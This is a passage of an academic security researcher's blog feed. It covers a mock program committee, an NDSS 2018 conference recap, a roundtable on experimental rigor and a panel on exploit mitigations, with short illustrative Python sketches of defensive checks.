before), until they start to normalize and become more practiced in their
reviewing skills.&lt;/p&gt;
&lt;p&gt;For each paper, we discussed strengths and weaknesses and worked on either
accepting or rejecting it. In the end, 5 out of 12 papers were rated at least
slightly positive and would advance to the next round, with likely 3 accepts.
Not bad for a first PC meeting. After we
finished the discussion, I went through all the reviews again and adjusted some
of my reviews and scores. This exercise was also worthwhile for me and helped me
improve my reviews as well.&lt;/p&gt;
&lt;p&gt;A note on conflicts of interest: handling conflicts is hard! I ensured that only
my primary advisees were reviewing the papers. As they share my conflicts and my
conflicts are a superset of theirs, this mitigates the risk of unhandled
conflicts.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;PC meetings are somewhat opaque to students. We as a community should help
students, who carry the main load of most research projects, to better
understand the review process. With understanding comes deeper insight that
allows optimizing the process. Students who understand how a paper is reviewed
by a PC member will start to write better papers -- highlighting the strengths
and novelties of the paper while clearly discussing its limitations.&lt;/p&gt;
&lt;p&gt;I hope this short summary is useful to new students. A tricky question when
conducting such mock PCs is conflicts of interest. As a PC member, the group
leader is responsible for all the reviews and should write the reviews
themselves. Orthogonally, students profit drastically from the experience of
reviewing papers. Until they are invited into PCs themselves or are senior
enough to become (rare) subreviewers, my opinion is that such mock PCs are a
great way to train our students.&lt;/p&gt;
&lt;p&gt;I always encourage comments and feedback. Let me know what you think, if your
opinion on an aspect of the review process differs, what I missed, or what we
can improve for the next mock PC!&lt;/p&gt;
&lt;/div&gt;
</content><category term="Academia"></category><category term="program committee"></category><category term="reviewing"></category></entry><entry><title>Raising the BAR at NDSS 2018</title><link href="/blog/2018/0221-raising_the_bar.html" rel="alternate"></link><published>2018-02-21T14:03:00-05:00</published><updated>2018-02-21T14:03:00-05:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2018-02-21:/blog/2018/0221-raising_the_bar.html</id><summary type="html">&lt;p&gt;Just like every year, this year's NDSS was mid February in sunny (but not too
warm) San Diego. To help cure the minimal 3 hour jetlag, I enjoyed a couple of
morning runs with some of my colleagues -- if you want to get a workout done at
a security conference …&lt;/p&gt;</summary><content type="html">&lt;p&gt;Just like every year, this year's NDSS was mid February in sunny (but not too
warm) San Diego. To help cure the minimal 3 hour jetlag, I enjoyed a couple of
morning runs with some of my colleagues -- if you want to get a workout done at
a security conference, just let me know and join us! The paper selection this
year was great, just as usual. The keynote talks were amazing, more on this
later as well. During the opening notes, &lt;a class="reference external" href="https://twitter.com/patrickgtraynor/status/965692043891638272"&gt;Alina Oprea and Patrick Traynor
commented on how to improve the reviewing process&lt;/a&gt;.  One thing
that changed this year was that we had a set of workshops on the day before the
conference.&lt;/p&gt;
&lt;p&gt;The workshops were vastly extended compared to prior years. Yours truly and
&lt;a class="reference external" href="http://mattsmith.de/"&gt;Matthew Smith&lt;/a&gt; served as workshop chairs. Compared to
the last years we broadly searched for new workshops and poached different
people to submit new and exciting workshop proposals. In the end we received
seven great workshop submissions out of which we were able to accept four due to
space constraints. The workshop I was most looking forward too was the BAR
(Workshop on Binary Analysis Research) as it highly overlapped my research
interests.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2018/0221/morningrun.jpg" /&gt;&lt;/p&gt;
&lt;div class="section" id="the-workshop-on-binary-analysis-research-bar"&gt;
&lt;h2&gt;The Workshop on Binary Analysis Research (BAR)&lt;/h2&gt;
&lt;p&gt;Due to a flight delay I missed the first half of the workshop day and only
sneaked in shortly before lunch. The keynote, as I heard, was amazing. Brendan
Dolan-Gavitt discussed &lt;a class="reference external" href="http://panda.moyix.net/~moyix/NDSS2018_BAR_Keynote.pdf"&gt;Prospects and Pitfalls for a Science of Binary Analysis&lt;/a&gt;. Binary analysis is
in a renaissance. Since the DARPA Cyber Grand Challenge, a lot of new research
in binary analysis has sprung up, greatly increasing precision and scaling
approaches to larger and more realistic binaries.&lt;/p&gt;
&lt;p&gt;Brendan lamented the absence of versatile datasets. In other areas, such as
image recognition, representative datasets have helped push towards ever
increasing progress. Effective datasets must be curated and tailored to a
problem. Interestingly, in system security research we often primarily use a set
of standard benchmarks to measure CPU and compiler performance (SPEC CPU2006).
This set of benchmarks has nothing to do with security. We need datasets to test
bug finding tools but also malware analysis tools.&lt;/p&gt;
&lt;p&gt;For bug finding, the DARPA CGC and LAVA datasets have changed the status
quo somewhat, and tools are finding more and more vulnerabilities in those
benchmarks. Both of these benchmarks are somewhat artificial, with bugs that
were either automatically injected or purposefully placed by programmers. The
best bug finding tools already find a large percentage of the synthetic bugs,
so we will soon have to develop new datasets. Datasets for malware analysis
have the problem that there is no ground truth. It is questionable whether a
dataset is representative, as malware campaigns quickly change to react to new
detection mechanisms.&lt;/p&gt;
&lt;p&gt;Binary analysis tasks may be hard, and we do not yet know how helpful
machine learning will be, as the datasets are hard to understand. As a common
pitfall, Brendan mentioned that coreutils binaries share up to 94% of their
code. Machine learning approaches will therefore have a hard time splitting
the programs into disjoint training and test sets; with so much shared code,
the evaluation effectively tests on the training set, resulting in
over-fitting and skewed results.&lt;/p&gt;
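One common way to reduce this pitfall is to group byte-identical samples before splitting, so that shared code never lands on both sides of the split. The sketch below is a hypothetical helper (not from the talk): it hashes each function body and assigns whole hash-groups to either the training or the test set.

```python
import hashlib

def leakage_free_split(functions, test_frac=0.25):
    """Split (name, code_bytes) samples into train/test name lists such
    that byte-identical code (e.g., a library routine statically linked
    into many coreutils binaries) never appears on both sides."""
    groups = {}
    for name, code in functions:
        digest = hashlib.sha256(code).hexdigest()
        groups.setdefault(digest, []).append(name)
    digests = sorted(groups)  # deterministic; shuffle with a fixed seed if desired
    cut = max(1, int(len(digests) * (1 - test_frac)))
    train = [n for d in digests[:cut] for n in groups[d]]
    test = [n for d in digests[cut:] for n in groups[d]]
    return train, test
```

Splitting by sample name instead of by content hash would let the duplicated routine leak into both sets, which is exactly the over-fitting trap described above.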
&lt;p&gt;The point Brendan makes here is that it is hard to assess a dataset's
validity: given a dataset, is it representative of the status quo, the hard
problems, and the current trends? Large, well-labeled public datasets are
crucial to progress in binary analysis. While we have made some progress in
the past, the road ahead is long and we will need to constantly improve our
datasets. This is a problem we can work on together as a community.&lt;/p&gt;
&lt;p&gt;In the afternoon, the &lt;a class="reference external" href="http://www.cs.unm.edu/~eschulte/data/bed.pdf"&gt;Evolving Exact Decompilation&lt;/a&gt; talk by &lt;a class="reference external" href="https://twitter.com/BanjoTragedy"&gt;Matt&lt;/a&gt; from GrammaTech was very impressive. The
idea is simple yet super effective: leverage a genetic optimization algorithm to
infer source code from a binary. Start with a simple skeleton, extract strings
and constants from the binary, then drive a genetic algorithm to compile the
binary to byte equivalent code. The optimization function is simply the edit
distance to the source binary. This approach worked surprisingly well for
smallish binaries. I do recommend reading the paper.&lt;/p&gt;
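To make the edit-distance fitness concrete, here is a toy sketch of the search loop. It evolves raw byte strings toward a target (standing in for the compiled binary); the real system instead mutates source code, invokes an actual compiler, and compares the compiled output. All names and parameters here are illustrative, not from the paper.

```python
import random

def edit_distance(a, b):
    # Levenshtein distance via dynamic programming: the fitness signal.
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                # delete ca
                           cur[j - 1] + 1,             # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]

def mutate(cand, alphabet):
    # One random edit: substitute, insert, or delete a byte.
    c = bytearray(cand)
    op, pos = random.randrange(3), random.randrange(len(c) + 1)
    if op == 0 and c:
        c[pos % len(c)] = random.choice(alphabet)
    elif op == 1:
        c.insert(pos, random.choice(alphabet))
    elif c:
        del c[pos % len(c)]
    return bytes(c)

def evolve(target, pop_size=16, generations=3000, seed=1234):
    random.seed(seed)
    alphabet = bytes(set(target))  # mirrors extracting constants from the binary
    population = [b""] * pop_size
    best = b""
    for _ in range(generations):
        population.sort(key=lambda c: edit_distance(c, target))
        best = population[0]
        if edit_distance(best, target) == 0:
            break  # byte-equivalent candidate found
        survivors = population[: pop_size // 2]  # elitist selection
        population = survivors + [mutate(random.choice(survivors), alphabet)
                                  for _ in survivors]
    return best
```

Because elitism always keeps the fittest candidates and the edit distance gives a smooth gradient toward the target, the loop converges quickly on small targets; the hard part in the real setting is that each fitness evaluation requires a full compile.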
&lt;p&gt;The paper sessions were followed by a real round table -- great job at moving
all those desks and chairs around! The round table focused on the present and
near future of binary analysis tooling. We discussed topics such as developments
of inter-changeable data formats. Using a common IR seemed to be out of the
question, mostly as many groups have already invested a lot of effort into
developing their own IRs, highly optimized for their use cases. But developing a
data interchange format, similar to the CNF format used by SAT solvers, may be
feasible. CNF sits at an interesting intersection: the format is far from the
internal representations that solvers use, yet transformable to all of them
without loss of generality. Other topics were datasets, remarks based on Brendan's
keynote, open-sourcing, and reproducibility of results. Yan and Fish, the
workshop chairs, promised to write a longer blog post about the round table and
I'm looking forward to that!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="beyond-smarts-toward-correct-private-data-rich-smart-contracts"&gt;
&lt;h2&gt;Beyond Smarts: Toward Correct, Private, Data-Rich Smart Contracts&lt;/h2&gt;
&lt;p&gt;Ari Juels gave an inspiring keynote on blockchains and smart contracts. His
idea was to implement a verifiable bug bounty program on top of Hydra, their
system for correct, private smart contracts that combines the advantages of
SGX and smart contracts. Hydra pairs smart contracts on the blockchain with
SGX: SGX provides fast computation and integrity but no availability, while
smart contracts provide the necessary availability. As an outsider, I found
the idea compelling as it would somewhat simplify the computation required in
a contract. We had long discussions about the keynote during the coffee break,
which is exactly what a keynote should inspire.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-long-winding-road-from-idea-to-impact-in-web-security"&gt;
&lt;h2&gt;The Long Winding Road from Idea to Impact in Web Security&lt;/h2&gt;
&lt;p&gt;&lt;a class="reference external" href="https://twitter.com/laparisa"&gt;Parisa Tabriz, the self-proclaimed browser boss and security princess&lt;/a&gt; talked about challenges in securing large
browsers. After the dust of the publication settles, there's still a long road
to getting a proposed defense or mitigation into a mainline browser. This road
involves a lot of engineering, policy changes, and discussions at all levels of
abstraction. Having a research idea and simply showing an implementation
prototype is not enough! The talk focused on three major thrusts to improve
browser security: retiring Adobe Flash, https as default, and per-iframe
isolation.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image2" src="/blog/static/2018/0221/deadflash.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;Flash was at fault for the majority of exploitable bugs in Google Chrome.
Since 2005 there have been more than 1,000 vulnerabilities with assigned CVE
numbers -- a lower bound on the total number of bugs, as not all bugs get a
CVE. Simply removing Flash was not an option as people expect the web to just
work; a browser must render legacy and broken content. The long road to
removing Flash consisted of a thousand little changes. First, they bundled
Flash to increase user convenience, which enabled Google to push auto-updates.
Second, they added mitigations to quickly disable plugins and whitelist plugin
usage on a per-domain basis. Third, they started fuzzing Flash based on a
large corpus (being a search company kind of helps in finding a large set of
Flash files); the fuzzing on 2,000 cores resulted in 400 unique crashes and
106 0-days. Fourth, they introduced bug bounties for Flash bugs. Fifth, they
sandboxed Flash through PPAPI. Sixth, they started pushing HTML5. Seventh,
they moved YouTube to HTML5. Eighth, Flash now requires click-to-play. Ninth,
HTML5 became the new default. Tenth, Flash End-Of-Life is set to 2020. Lessons
learned: (i) Flash was Google's problem too, despite being made by another
company; (ii) dumb fuzzing works great; (iii) incident response instigated
better architecture; (iv) an ecosystem change takes time.&lt;/p&gt;
&lt;p&gt;HTTPS should be the default and HTTP should be marked as not secure. The initial
symbols for the connection status were good (https, valid certificate), dubious,
and bad depending on the error status. The new set of symbols simply uses a
green lock for a protected connection and a red open lock to signal any error.
This branch of work is based on research by &lt;a class="reference external" href="https://research.google.com/pubs/pub45366.html"&gt;Adrienne Porter Felt&lt;/a&gt;.
Challenges to push for the adoption of those changes were based on (i)
motivation (why should we move to HTTPS if HTTP works just fine); (ii) revenue
and performance risks as HTTPS may increase the CPU time; and (iii) third party
dependencies as some JavaScript libraries did not support HTTPS transports.
An interesting orthogonal problem was cultural quirks: in Japan, small
companies started to adopt HTTPS out of shame only after a big mover could be
convinced (i.e., it was embarrassing not to have HTTPS after the big player
adopted it). Lessons learned: (i) Google needed a business case for change;
(ii) research was critical to make changes; (iii) ecosystem change takes time;
(iv) conspiracy theories abound!&lt;/p&gt;
&lt;p&gt;Individual iframes should be isolated from each other. Let's use Chrome's
sandbox to isolate them! This challenge ultimately turned into a refactoring
project for Google Chrome. The renderer enforces same-origin policy, if the
renderer is compromised then the same-origin policy can be broken. Originally
Chrome used WebKit as renderer but the continuing changes were too drastic, so
Chrome forked WebKit into Blink in 2013. The overall goal is to run the evil.com
iframe in a different renderer process than the good.com website (which loads
evil.com). As a side note, Spectre/Meltdown can read anything from its address
space. Per-site process is perfect mitigation for such issues. Google Chrome is
moving to full &lt;a class="reference external" href="https://sites.google.com/a/chromium.org/dev/Home/chromium-security/site-isolation"&gt;per-site isolation&lt;/a&gt;
to protect individual frames. Lessons learned: (i) redesigning an engine in
flight takes longer; (ii) details really matter; (iii) research &lt;em&gt;can&lt;/em&gt; be
prioritized; (iv) defense in depth pays off.&lt;/p&gt;
&lt;p&gt;Overall, this was the best keynote I've seen in a long time and I thoroughly
enjoyed the deep discussions and details Parisa provided. If you have spare
time, check out the &lt;a class="reference external" href="https://sites.google.com/a/chromium.org/dev/Home/chromium-security"&gt;Chromium Security page&lt;/a&gt; and I
hope that the recording of the keynote will become available!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="paper-highlights"&gt;
&lt;h2&gt;Paper Highlights&lt;/h2&gt;
&lt;p&gt;The NDSS conference was obviously not just about keynotes but also had great
research paper sessions. I was a little too slow to be session chair as, when I
replied to the email asking for chairs, all the sessions in my area were already
covered.&lt;/p&gt;
&lt;p&gt;The first session contained a great set of IoT fuzzing papers. In &lt;em&gt;IoTFuzzer:
Discovering Memory Corruptions in IoT Through App-based Fuzzing&lt;/em&gt;, Jiongyi Chen,
Wenrui Diao, Qingchuan Zhao, Chaoshun Zuo, Zhiqiang Lin, XiaoFeng Wang, Wing
Cheong Lau, Menghan Sun, Ronghai Yang, and Kehuan Zhang extract data from
Android controller applications to generate a fuzzing corpus.
Later in &lt;em&gt;What You Corrupt Is Not What You Crash: Challenges in Fuzzing Embedded
Devices&lt;/em&gt;, Marius Muench, Jan Stijohann, Frank Kargl, Aurelien Francillon, and
Davide Balzarotti leverage different signals to test what the underlying reason
for a bug is, e.g., TCP connection reset to infer internal state of the embedded
device when fuzzing it.&lt;/p&gt;
&lt;p&gt;The session on software attacks and secure architectures contained another
set of interesting papers. In &lt;em&gt;KeyDrown: Eliminating Software-Based Keystroke Timing
Side-Channel Attacks&lt;/em&gt; Michael Schwarz, Moritz Lipp, Daniel Gruss, Samuel Weiser,
Clémentine Maurice, Raphael Spreitzer, and Stefan Mangard discuss how interrupt
timing channels allow inference of key presses. They propose to add random
interrupts to mitigate this side channel. In &lt;em&gt;Securing Real-Time Microcontroller
Systems through Customized Memory View Switching&lt;/em&gt; Chung Hwan Kim, Taegyu Kim,
Hongjun Choi, Zhongshu Gu, Byoungyoung Lee, Xiangyu Zhang, and Dongyan Xu
encapsulate safe areas in microcontrollers to protect critical functionality
and to detect/mitigate attacks. The encapsulation mechanism has very low
performance and memory overhead but requires some manual instrumentation.
Later, in &lt;em&gt;Tipped Off by Your Memory Allocator: Device-Wide User
Activity Sequencing from Android Memory Images&lt;/em&gt;, Rohit Bhatia, Brendan
Saltaformaggio, Seung Jei Yang, Aisha Ali-Gombe, Xiangyu Zhang, Dongyan Xu, and
Golden G. Richard III leverage Android memory images to recover allocation
sequences and application details.&lt;/p&gt;
&lt;p&gt;Out of obvious reasons, the software security session was the most interesting
one -- this was the session for our HexHive paper and my favorite other paper.
First, &lt;em&gt;K-Miner: Uncovering Memory Corruption in Linux&lt;/em&gt; by David Gens,
Simon Schmitt, Lucas Davi, and Ahmad-Reza Sadeghi propose an extensible
full-kernel static analysis system and evaluate it by searching the kernel for
memory safety violation. The impressing fact is that the LLVM-based framework
scales to the full Linux kernel. Second, &lt;a class="reference external" href="https://nebelwelt.net/publications/files/18NDSS.pdf"&gt;CFIXX: Object Type Integrity for C++&lt;/a&gt; by Nathan Burow, Derrick
McKee, Scott A. Carr, and Mathias Payer introduces Object Type Integrity, a new
security policy that protects vtable pointers for C++ applications against
adversary-controlled writes. C++ objects may only be created by legitimate program
flow through a constructor call. Virtual dispatch is adjusted to leverage the
protected vtable pointers, thereby guarding control flow. You should obviously
read both papers, starting with the CFIXX paper!&lt;/p&gt;
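&lt;p&gt;As a rough sketch of the policy (not the CFIXX implementation, which
instruments compiled C++ at the LLVM level), object type integrity amounts to
recording each object's vtable pointer in write-protected metadata at
construction time and validating it on every virtual dispatch; the names below
are hypothetical:&lt;/p&gt;

```python
# Illustrative sketch of object type integrity; the metadata table stands in
# for a memory region that only the protected runtime may write.
PROTECTED_VTABLES = {}

def on_construct(obj_id, vtable):
    # Only a constructor call may register a vtable for an object.
    PROTECTED_VTABLES[obj_id] = vtable

def virtual_dispatch(obj_id, claimed_vtable, method):
    # Dispatch consults the protected copy, so an adversary-controlled write
    # to the object's inline vtable pointer is detected here.
    if PROTECTED_VTABLES.get(obj_id) is not claimed_vtable:
        raise RuntimeError("vtable pointer corrupted")
    return PROTECTED_VTABLES[obj_id][method]()
```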
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2018/0221/cfixx.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;The paper &lt;em&gt;Superset Disassembly: Statically Rewriting x86 Binaries Without
Heuristics&lt;/em&gt; by Erick Bauman, Zhiqiang Lin, and Kevin Hamlen proposes a static
reassembler that leverages concepts from dynamic binary translation. The
retranslator builds on a set of assumptions and ideas: first, keep data
static and constant, assuming that references to data remain valid. Second, create
a mapping from old addresses to new addresses (similar to dynamic binary
translators). Third, rewrite all executable data to differentiate code from
data. Fourth, rewrite all libraries to cover all executable code. The
performance and memory overhead is still a little on the high side, but the
idea is interesting.&lt;/p&gt;
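&lt;p&gt;The second idea can be pictured as a lookup table that rewritten indirect
branches consult at runtime, much like the translation cache of a dynamic
binary translator. A toy sketch with made-up addresses:&lt;/p&gt;

```python
# Hypothetical old-to-new address mapping maintained by a static rewriter.
ADDR_MAP = {0x401000: 0x501000, 0x401020: 0x501040}

def translate(target):
    # Rewritten indirect branches look up the relocated location; targets
    # outside the mapping fall through unchanged (data is kept static).
    return ADDR_MAP.get(target, target)
```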
&lt;p&gt;An honorable mention goes to the two interesting web security talks &lt;em&gt;JavaScript
Zero: Real JavaScript and Zero Side-Channel Attacks&lt;/em&gt; and &lt;em&gt;Riding out DOMsday:
Towards Detecting and Preventing DOM Cross-Site Scripting&lt;/em&gt;.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="NDSS"></category><category term="security"></category></entry><entry><title>Roundtable on rigor in experimentation</title><link href="/blog/2017/0814-experimentation-rigor.html" rel="alternate"></link><published>2017-08-14T17:52:00-04:00</published><updated>2017-08-14T17:52:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2017-08-14:/blog/2017/0814-experimentation-rigor.html</id><summary type="html">&lt;p&gt;This year at CSET yours truly had the pleasure to organize a round table on
rigor in experimentation with Geoff Voelker, Micah Sherr, and Adam Doupé as
panelists. After a quick introduction and mission statements we discussed rigor
in experimentation along several dimensions. The most interesting aspects were
open source …&lt;/p&gt;</summary><content type="html">&lt;p&gt;This year at CSET yours truly had the pleasure to organize a round table on
rigor in experimentation with Geoff Voelker, Micah Sherr, and Adam Doupé as
panelists. After a quick introduction and mission statements we discussed rigor
in experimentation along several dimensions. The most interesting aspects were
open source in academia and maintenance of code, design of experiments and
comparison to other sciences, published results and reproducibility, and how
defining metrics for security is hard.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2017/0814/experiment.png" /&gt;&lt;/p&gt;
&lt;p&gt;Geoff Voelker is well known for his focus on computer systems, networking, and network
security with both experimental and empirical research. Two aspects of his
research include challenging internet-wide experiments and measuring volatile
data. During his mission statement he discussed the problem of reproducing
one's own results and argued that computer science research labs need to
develop strategies and guidelines for experiments, including detailed lab notes
and exact details of how benchmarks are run. He included the anecdote that some of his papers include
individual SQL queries used to generate specific graphs and data, thereby
documenting the required resources. Students must label, backup, log, and detail
all their results. Whenever a student produces a graph and brings it to a
discussion, he encourages the student to challenge the validity of the data,
which has helped find programming errors on several occasions. Another important
lesson that he teaches students is the difficulty of correctly setting up an
experiment. New students must first reproduce an existing experiment and during
this process they learn how easy it is to make mistakes. As they know how the
data should look, it is easier to spot mistakes and improve in the process.&lt;/p&gt;
&lt;p&gt;Adam Doupé's research centers on web security; he builds automated tools to
discover web vulnerabilities and infer bugs. Through measuring the effectiveness
of web vulnerability scanners he developed metrics to compare different tools
and analyzed their weaknesses. Building on this framework he looked into
developing defenses against server-side vulnerabilities. He is best known for
playing with Shellphish and leveraging capture-the-flag hacking games to educate
security students. Many of the prototypes of his work are on GitHub. In his
mission statement, Adam brought up the importance of reproducibility. As a
community (and inside each research group) we need to push towards making our
research reproducible. Open-source and sharing data sets are crucial
requirements for reproducibility. He brought up a point that it may not always
be possible to open-source prototypes, especially for companies that have
business interests in a given prototype.&lt;/p&gt;
&lt;p&gt;Micah Sherr focuses on privacy-preserving technology, e-voting security,
eavesdropping, and wiretapping. By his own description, he likes to break stuff
and fix things. In the past, he worked on creating testbeds for Tor, systematizing
challenges in security research for cyber physical systems, and measurement
experiments. In his statement, Micah brought up challenges in incentives in the
publication process. To publish a paper, a prototype needs to be improved until
its performance (according to whatever metric) surpasses the performance of the
prior system. As soon as the prototype improves upon the related work, the
process stops and the results are published. An interesting challenge is the difference
between rigor and quality. While quality addresses how to handle insufficient
work, rigor defines how to do good science. Students must be rigorous in
analyzing results and reproducibility may not be an inherent criterion or
requirement for good science (or not even possible in certain cases).&lt;/p&gt;
&lt;p&gt;After the mission statements we branched into a discussion of different topics
with lively audience interaction. Most prominent was the discussion
about open-source and whether it should be a requirement for publication.
Open-source is the first step towards reproducibility. As a precondition it must
be satisfied but open-source alone does not inherently allow reproducibility or
even repeatability. Reproducibility comes in different flavors. If the
benchmarks can be rerun with the same code and the same data, the experiment can
be repeated. Full reproducibility requires reimplementing the system according
to the description in the paper and running it both on the same and additional
data to ensure that the system did not just cover a small hand-crafted set of
examples. If the code is well documented, results may be repeated;
reproducibility requires a lot of additional legwork.&lt;/p&gt;
&lt;p&gt;If source code is released at all, the quality may not be stellar. Students
often write their prototypes under time pressure and as soon as the benchmarks
run, development stops. Interestingly, the last commit of open-source research
prototypes often aligns with the publication date of the paper. An interesting
discussion point was that the open-source prototype should be consumed as-is.
While the authors may help with documentation and some requests, it is not the
responsibility of the authors to maintain the code and port it to other systems.
Maintainability is the job of the code consumers; other researchers who try to
replicate the results have to address portability. Note that it is always a nice
gesture and good form to help wherever you can, but it is not an obligation.
Open-source research prototypes should not be considered production ready.&lt;/p&gt;
&lt;p&gt;Artifact evaluation goes along with reproducibility and may be an interesting
complementary aspect. Program committees have started to include more and more artifact
evaluations. Papers with accompanying artifacts that are successfully evaluated
(usually by graduate students who build the prototype and repeat the results in
a couple of hours) receive an artifact evaluation award or badge. Such badges
may be used as incentives for authors to open-source their prototypes as it
shows that the results in the paper can at least be repeated.&lt;/p&gt;
&lt;p&gt;The last topic was responsible disclosure and legal aspects of security
research. While responsible disclosure (letting software or hardware vendors
privately know about any discovered vulnerabilities and giving them time to
patch them) is well accepted in the community, adversarial research may still be
controversial. Open-sourced adversarial research, e.g., bug-finding or
exploitation tools, may lead to legal issues, as these tools could be classified
as weapons. As these legal frameworks are being developed, security researchers
must be aware of such possible pitfalls.&lt;/p&gt;
&lt;p&gt;Overall we had a great time discussing these different aspects of rigor in
security research. Although we talked for an hour, time went by very quickly and
we agreed that we could have continued to talk for a couple more hours! The
audience joined in on the discussion and we were happy with all the great
questions. Thanks to the great panelists, we had a wide range of expertise and I
believe that the audience enjoyed our chat.&lt;/p&gt;
</content><category term="Conferences"></category><category term="panel"></category><category term="experimentation"></category><category term="security"></category><category term="CSET"></category></entry><entry><title>Mitigations: Completeness/Effectiveness vs Performance</title><link href="/blog/2017/0707-mitigation-panel.html" rel="alternate"></link><published>2017-07-07T09:38:00-04:00</published><updated>2017-07-07T09:38:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2017-07-07:/blog/2017/0707-mitigation-panel.html</id><summary type="html">&lt;p&gt;As part of ESSoS ‘17 we have organized a joint ESSoS/DIMVA panel on exploit
mitigations, discussing the past, present, and future of mitigations. If we look
at the statistics of reported memory corruptions we see an upward trend in
number of reported vulnerabilities. Given the success of contests such …&lt;/p&gt;</summary><content type="html">&lt;p&gt;As part of ESSoS ‘17 we have organized a joint ESSoS/DIMVA panel on exploit
mitigations, discussing the past, present, and future of mitigations. If we look
at the statistics of reported memory corruptions, we see an upward trend in the
number of reported vulnerabilities. Given the success of contests such as
pwn2own, one might conclude that mitigations have not been effective; in fact,
exploitation has become much harder and more costly through the development of
mitigations.&lt;/p&gt;
&lt;p&gt;&lt;img alt="image0" src="/blog/static/2017/0707/panel.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;Over the last 15 years we as a community have developed a set of defenses that
make successful exploitation much harder, see our &lt;a class="reference external" href="https://nebelwelt.net/publications/files/13Oakland.pdf"&gt;Eternal War in Memory&lt;/a&gt; paper for a
systematization of all these mitigations. With stack cookies, software is
protected against contiguous buffer overflows, which stops simple stack smashing
attacks. About 10 years ago, the combination of Address Space Layout
Randomization -- ASLR, which shuffles the address space -- and Data Execution
Prevention -- DEP, which enforces a separation between code and data --
increased the protection against code reuse attacks. DEP itself protects against
code injection but requires ASLR to protect against code reuse attacks. In the
last 2 years, Control-Flow Integrity -- CFI, a policy that restricts the runtime
control flow to programmer intended targets -- has been deployed in two flavors:
coarse-grained through Microsoft’s Control-Flow Guard and fine-grained through
Google’s LLVM-CFI. In addition, Intel has proposed a fine-grained shadow stack
to protect the backward edge (function returns) and a coarse-grained
forward-edge mechanism to protect indirect function calls that will be
implemented in hardware. See an &lt;a class="reference external" href="https://nebelwelt.net/blog/20160913-ControlFlowIntegrity.html"&gt;earlier blogpost&lt;/a&gt; or &lt;a class="reference external" href="https://nebelwelt.net/publications/files/17CSUR.pdf"&gt;our survey&lt;/a&gt; for a discussion of the
different CFI mechanisms.&lt;/p&gt;
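&lt;p&gt;To make the shadow-stack idea concrete, here is a toy sketch of the check
performed on every call and return, assuming (as in the hardware proposal) that
the shadow region cannot be written by ordinary code; the hook names are
hypothetical:&lt;/p&gt;

```python
# Minimal shadow-stack sketch: calls push the return address to a protected
# copy, returns compare against it.
shadow_stack = []

def on_call(return_address):
    shadow_stack.append(return_address)

def on_return(return_address):
    expected = shadow_stack.pop()
    # A mismatch means the on-stack return address was overwritten,
    # e.g. by a ROP payload.
    if expected != return_address:
        raise RuntimeError("return address corrupted")
    return return_address
```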
&lt;p&gt;&lt;img alt="image1" src="/blog/static/2017/0707/memattacks.png" /&gt;
Memory corruption vulnerabilities over time. Thanks to Victor van der Veen from
VU for the data.&lt;/p&gt;
&lt;p&gt;We started off the panel with brief mission statements and an introduction of
the three panelists: Thomas Dullien, Cristiano Giuffrida, and Michalis
Polychronakis. Yours truly served as the humble (and only slightly biased)
moderator.&lt;/p&gt;
&lt;p&gt;Thomas Dullien from Google started the introduction round. Coming from an
academic background but having switched to industry after doing a malware and
reverse engineering startup has exposed him to a lot of security practice. He
argued that none of the academic proposals (except for CFI) are deployed (ASLR +
DEP originated outside academia, although one could argue that stack cookies
started in academia and were refined to practicality in industry) and that
academia has been optimizing for the wrong metrics. Academics often follow a
partial view of attacks and do not consider the full system stack. In addition,
attacks may only be partially stopped or a defense protects against a primitive
instead of against an attack vector. In his opinion, academics should think
about what they want to mitigate and clearly define their attacker models and
threat models. Thomas argued for compartmentalization, moving untrusted
components into sandboxes and protecting the remaining code with strong
mitigations.&lt;/p&gt;
&lt;p&gt;Cristiano Giuffrida from VUsec at VU Amsterdam mentioned their research in
different mitigations and stressed that they focus on practical defenses. VUsec
is known for CFI mitigations for binaries and source code and for novel
approaches that target type safety. Focusing on systems research, VUsec is
building frameworks for mitigations such as a generic metadata storage system.
Going beyond defenses, VUsec is also known for different attacks leveraging
combinations of rowhammer to flip bits (i.e., using it as a write primitive)
with different side channels (i.e., using them as a read primitive) to allow
exploitation beyond any attacker model used in current mitigations. Cristiano
argued for metrics along multiple dimensions. To effectively compare different
mitigations, we need to develop clear metrics along performance (CPU) cost,
memory cost, binary compatibility, and functional compatibility.&lt;/p&gt;
&lt;p&gt;Michalis Polychronakis from Stony Brook talked about their research on
probabilistic defenses. Protecting different domains poses new and interesting
challenges. For example, protecting operating system kernels requires knowledge
of the underlying data structures and the degrees of freedom are limited as both
user-space and kernel-space are designed with certain assumptions. Another point
Michalis brought up is compatibility and the need to protect binary-only
programs. Binaries are always available and development of binary analysis
techniques allows protection of any code. Source code may be more precise
initially but deployment will be harder, especially when some components are not
available as open-source such as the libc or proprietary libraries. Michalis
agreed that compatibility is challenging and that useful defenses will be low
(zero) overhead, highly compatible, and mitigate complete attack classes.&lt;/p&gt;
&lt;p&gt;After the initial position statements we iterated over several main discussion
topics: CFI and its research success, sandboxing, composition of mitigations,
hardware deployment, reproducibility, metrics, and benchmarks.&lt;/p&gt;
&lt;p&gt;The first discussion topic was the transfer of academic research to practice,
using CFI as an example. CFI was proposed by academics and academia has worked
tirelessly for the last 10 years to refine CFI policies. CFI has been adapted to
kernel and user-space, for binaries and source code, and all at different levels
of granularity and precision. Generally, the performance and memory overhead is
low to negligible. In addition to many software implementations, CFI is on the
